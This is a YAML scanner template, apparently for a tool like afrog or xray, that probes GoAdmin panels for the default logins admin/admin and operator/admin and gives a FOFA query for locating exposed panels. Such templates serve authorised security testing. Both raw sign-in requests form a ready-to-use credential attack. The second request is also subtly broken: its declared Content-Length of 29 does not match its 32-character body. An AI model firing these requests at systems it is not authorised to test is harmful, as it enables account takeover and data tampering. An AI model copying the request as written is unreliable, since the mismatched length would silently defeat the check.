id: goadmin-default-login

info:
  name: GoAdmin - Default Login
  author: qwtd
  severity: high
  verified: true
  description: |
    GoAdmin a default login vulnerability. Default admin login password of 'admin' was found. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
    FOFA: body="<h2>GoAdmin</h2>"
  tags: default-login,goadmin
  created: 2023/09/21

set:
  hostname: request.url.host

rules:
  r0:
    request:
      raw: |
        POST /admin/signin HTTP/1.1
        Host: {{hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.97 Safari/537.36
        Connection: close
        Content-Length: 29

        username=admin&password=admin
    expression: |
      response.status == 200 && response.body.ibcontains(b'"msg":"ok"')
  r1:
    request:
      raw: |
        POST /admin/signin HTTP/1.1
        Host: {{hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.97 Safari/537.36
        Connection: close
        Content-Length: 29

        username=operator&password=admin
    expression: |
      response.status == 200 && response.body.ibcontains(b'"msg":"ok"')
expression: r0() || r1()